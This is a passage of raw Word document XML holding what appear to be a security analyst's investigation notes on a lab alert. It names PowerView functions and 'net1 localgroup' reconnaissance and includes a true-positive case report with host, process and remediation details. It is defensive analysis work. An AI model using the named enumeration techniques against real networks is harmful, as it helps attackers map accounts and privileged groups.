      </w:r>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> used by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002FBAA6" w14:textId="77777777" w:rsidR="00F17D05" w:rsidRPr="00F17D05" w:rsidRDefault="00F17D05" w:rsidP="00F17D05">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F17D05">
        <w:t>Red teams</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42183464" w14:textId="77777777" w:rsidR="00F17D05" w:rsidRPr="00F17D05" w:rsidRDefault="00F17D05" w:rsidP="00F17D05">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F17D05">
        <w:t>Penetration testers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359EC21D" w14:textId="77777777" w:rsidR="00F17D05" w:rsidRPr="00F17D05" w:rsidRDefault="00F17D05" w:rsidP="00F17D05">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F17D05">
        <w:lastRenderedPageBreak/>
        <w:t>Actual attackers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353DFE58" w14:textId="23466486" w:rsidR="00F17D05" w:rsidRDefault="00F17D05" w:rsidP="00107FAD">
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve">No normal admin uses </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>PowerView</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> for routine work. Microsoft does not ship this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4871C9D5" w14:textId="77777777" w:rsidR="00F17D05" w:rsidRPr="00F17D05" w:rsidRDefault="00F17D05" w:rsidP="00F17D05">
      <w:r w:rsidRPr="00F17D05">
        <w:t>The commands inside the script do things like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5058BE87" w14:textId="77777777" w:rsidR="00F17D05" w:rsidRPr="00F17D05" w:rsidRDefault="00F17D05" w:rsidP="00F17D05">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F17D05">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔸</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17D05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Enumerating domain users (Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NetUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77922C30" w14:textId="77777777" w:rsidR="00F17D05" w:rsidRPr="00F17D05" w:rsidRDefault="00F17D05" w:rsidP="00F17D05">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F17D05">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔸</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17D05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Enumerating ACLs (Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ObjectACL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB623E6" w14:textId="77777777" w:rsidR="00F17D05" w:rsidRPr="00F17D05" w:rsidRDefault="00F17D05" w:rsidP="00F17D05">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F17D05">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔸</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17D05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Parsing logons (Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UserEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8C0F24" w14:textId="77777777" w:rsidR="00F17D05" w:rsidRPr="00F17D05" w:rsidRDefault="00F17D05" w:rsidP="00F17D05">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F17D05">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔸</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17D05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Searching for passwords in AD fields (Find-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UserField</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2D90BA" w14:textId="77777777" w:rsidR="00F17D05" w:rsidRPr="00F17D05" w:rsidRDefault="00F17D05" w:rsidP="00F17D05">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F17D05">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔸</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17D05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Adding users to local groups (the snippet you posted earlier!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E15EF55" w14:textId="77777777" w:rsidR="00F17D05" w:rsidRDefault="00F17D05" w:rsidP="00F17D05">
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve">These are </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17D05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>classic post-exploitation actions</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> after gaining initial access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA0FB3A" w14:textId="37FFA8BB" w:rsidR="00F17D05" w:rsidRDefault="00F17D05" w:rsidP="00F17D05">
      <w:r>
        <w:t>SO IT IS A TRUE POSITIVE. CASE REPORT –</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105B2F66" w14:textId="77777777" w:rsidR="00F17D05" w:rsidRPr="00F17D05" w:rsidRDefault="00F17D05" w:rsidP="00F17D05">
      <w:r w:rsidRPr="00F17D05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Time of activity:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1536147B" w14:textId="77777777" w:rsidR="00F17D05" w:rsidRPr="00F17D05" w:rsidRDefault="00F17D05" w:rsidP="00F17D05">
      <w:r w:rsidRPr="00F17D05">
        <w:t> 11/23/2025 06:07:56.349</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BC5D8B" w14:textId="77777777" w:rsidR="00F17D05" w:rsidRPr="00F17D05" w:rsidRDefault="00F17D05" w:rsidP="00F17D05">
      <w:r w:rsidRPr="00F17D05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>List of Affected Entities:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135D7371" w14:textId="77777777" w:rsidR="00F17D05" w:rsidRPr="00F17D05" w:rsidRDefault="00F17D05" w:rsidP="00F17D05">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>event.code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>: 11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032276A5" w14:textId="77777777" w:rsidR="00F17D05" w:rsidRPr="00F17D05" w:rsidRDefault="00F17D05" w:rsidP="00F17D05">
      <w:r w:rsidRPr="00F17D05">
        <w:t>host.name: win-3450</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2E3B15" w14:textId="77777777" w:rsidR="00F17D05" w:rsidRPr="00F17D05" w:rsidRDefault="00F17D05" w:rsidP="00F17D05">
      <w:r w:rsidRPr="00F17D05">
        <w:t>process.name: powershell.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749D75BC" w14:textId="77777777" w:rsidR="00F17D05" w:rsidRPr="00F17D05" w:rsidRDefault="00F17D05" w:rsidP="00F17D05">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>process.pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>: 9060</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BAADB9" w14:textId="77777777" w:rsidR="00F17D05" w:rsidRPr="00F17D05" w:rsidRDefault="00F17D05" w:rsidP="00F17D05">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>event.action</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve">: File created (rule: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>FileCreate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA778EF" w14:textId="77777777" w:rsidR="00F17D05" w:rsidRPr="00F17D05" w:rsidRDefault="00F17D05" w:rsidP="00F17D05">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>file.path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>: C:\Users\michael.ascot\Downloads\PowerView.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D743C9" w14:textId="77777777" w:rsidR="00F17D05" w:rsidRPr="00F17D05" w:rsidRDefault="00F17D05" w:rsidP="00F17D05">
      <w:r w:rsidRPr="00F17D05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reason for Classifying as True Positive:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B50637D" w14:textId="77777777" w:rsidR="00F17D05" w:rsidRPr="00F17D05" w:rsidRDefault="00F17D05" w:rsidP="00F17D05">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>PowerView</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> script being executed has malicious code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66059AB5" w14:textId="77777777" w:rsidR="00F17D05" w:rsidRPr="00F17D05" w:rsidRDefault="00F17D05" w:rsidP="00F17D05">
      <w:r w:rsidRPr="00F17D05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reason for Escalating the Alert:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000D0BF7" w14:textId="77777777" w:rsidR="00F17D05" w:rsidRPr="00F17D05" w:rsidRDefault="00F17D05" w:rsidP="00F17D05">
      <w:r w:rsidRPr="00F17D05">
        <w:t>Must be responded to immediately or organization network may be compromised</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F90C006" w14:textId="77777777" w:rsidR="00F17D05" w:rsidRPr="00F17D05" w:rsidRDefault="00F17D05" w:rsidP="00F17D05">
      <w:r w:rsidRPr="00F17D05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recommended Remediation Actions:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F236FFC" w14:textId="77777777" w:rsidR="00F17D05" w:rsidRPr="00F17D05" w:rsidRDefault="00F17D05" w:rsidP="00F17D05">
      <w:r w:rsidRPr="00F17D05">
        <w:t>User endpoint check, password reset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8BFAD2" w14:textId="77777777" w:rsidR="00F17D05" w:rsidRPr="00F17D05" w:rsidRDefault="00F17D05" w:rsidP="00F17D05">
      <w:r w:rsidRPr="00F17D05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>List of Attack Indicators:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E221D9D" w14:textId="77777777" w:rsidR="00F17D05" w:rsidRPr="00F17D05" w:rsidRDefault="00F17D05" w:rsidP="00F17D05">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>PowerView</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> Script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD6C2E9" w14:textId="77777777" w:rsidR="00F17D05" w:rsidRPr="00F17D05" w:rsidRDefault="00F17D05" w:rsidP="00F17D05">
      <w:r w:rsidRPr="00F17D05">
        <w:t>Has malicious code being executed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5567E3A7" w14:textId="0D634C55" w:rsidR="00F17D05" w:rsidRDefault="008573CD" w:rsidP="00F17D05">
      <w:r>
        <w:t xml:space="preserve">NEXT – </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683EC2BE" w14:textId="530E8E7D" w:rsidR="008573CD" w:rsidRPr="00F17D05" w:rsidRDefault="008573CD" w:rsidP="00F17D05">
      <w:r w:rsidRPr="008573CD">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="707D2780" wp14:editId="6E86EDEE">
            <wp:extent cx="5731510" cy="1911985"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1953842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3842493" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1911985"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFB4FB9" w14:textId="3F50E99A" w:rsidR="00F17D05" w:rsidRDefault="008573CD" w:rsidP="00107FAD">
      <w:r>
        <w:t xml:space="preserve">What this basically means is that another user/machine is attempting to connect to the victim machine to access and operate with files on his machines. Now within an organisation this may be common. But we just previously saw a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PowerView</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> script created on the victims PC and in this alert the parent process is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and the child is net.exe. Also the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>commandline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> shows that the external machine/user may be attempting to access Financial Records which may be normal but still suspicious. So we search through event logs for net.exe. These events come up:-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CF6554" w14:textId="77777777" w:rsidR="00C86771" w:rsidRDefault="008573CD" w:rsidP="00107FAD">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008573CD">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A5D537E" wp14:editId="55A525E2">
            <wp:extent cx="5731510" cy="1995170"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="1101893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1893319" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1995170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="008573CD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDA1D71" w14:textId="77777777" w:rsidR="00C86771" w:rsidRDefault="00C86771" w:rsidP="00107FAD">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Attacker is carrying out reconnaisance by listing out all users by  executing the net1 script which is a child of net.exe to identify accounts to compromise.</w:t>
      </w:r>
      <w:r w:rsidR="008573CD" w:rsidRPr="008573CD">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20C9234C" wp14:editId="378DA400">
            <wp:extent cx="5731510" cy="2526030"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="10672505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250534" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2526030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="008573CD" w:rsidRPr="008573CD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008573CD" w:rsidRPr="008573CD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CBAE1D9" wp14:editId="6EFEEF90">
            <wp:extent cx="5731510" cy="2527935"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="8707755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775596" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2527935"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="008573CD" w:rsidRPr="008573CD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008573CD" w:rsidRPr="008573CD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FB1E15E" wp14:editId="5E8A296F">
            <wp:extent cx="5731510" cy="2569845"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="758590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8590727" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2569845"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="008573CD" w:rsidRPr="008573CD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25877137" w14:textId="77777777" w:rsidR="00C86771" w:rsidRPr="00C86771" w:rsidRDefault="00C86771" w:rsidP="00C86771">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C86771">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>net1 localgroup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580F087F" w14:textId="77777777" w:rsidR="00C86771" w:rsidRPr="00C86771" w:rsidRDefault="00C86771" w:rsidP="00C86771">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C86771">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Meaning:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C5CED8" w14:textId="77777777" w:rsidR="00C86771" w:rsidRPr="00C86771" w:rsidRDefault="00C86771" w:rsidP="00C86771">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C86771">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker is listing </w:t>
      </w:r>
      <w:r w:rsidRPr="00C86771">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>all local groups</w:t>
      </w:r>
      <w:r w:rsidRPr="00C86771">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> on the system:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669D2515" w14:textId="77777777" w:rsidR="00C86771" w:rsidRPr="00C86771" w:rsidRDefault="00C86771" w:rsidP="00C86771">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C86771">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Administrators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A4970F" w14:textId="77777777" w:rsidR="00C86771" w:rsidRPr="00C86771" w:rsidRDefault="00C86771" w:rsidP="00C86771">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C86771">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Remote Desktop Users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0643DAAB" w14:textId="77777777" w:rsidR="00C86771" w:rsidRPr="00C86771" w:rsidRDefault="00C86771" w:rsidP="00C86771">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C86771">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Backup Operators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742878C8" w14:textId="77777777" w:rsidR="00C86771" w:rsidRPr="00C86771" w:rsidRDefault="00C86771" w:rsidP="00C86771">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C86771">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAE865E" w14:textId="56E41DE6" w:rsidR="00C86771" w:rsidRPr="00C86771" w:rsidRDefault="00C86771" w:rsidP="00C86771">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C86771">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Intent:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C86771">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C86771">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Identify high-privilege groups they may try to add themselves to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC42C71" w14:textId="77777777" w:rsidR="00C86771" w:rsidRDefault="008573CD" w:rsidP="00107FAD">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008573CD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E47B50F" wp14:editId="4504C817">
            <wp:extent cx="5731510" cy="2147570"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="821137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137774" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2147570"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="008573CD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E34452" w14:textId="6035FBBA" w:rsidR="008573CD" w:rsidRDefault="00C86771" w:rsidP="00107FAD">
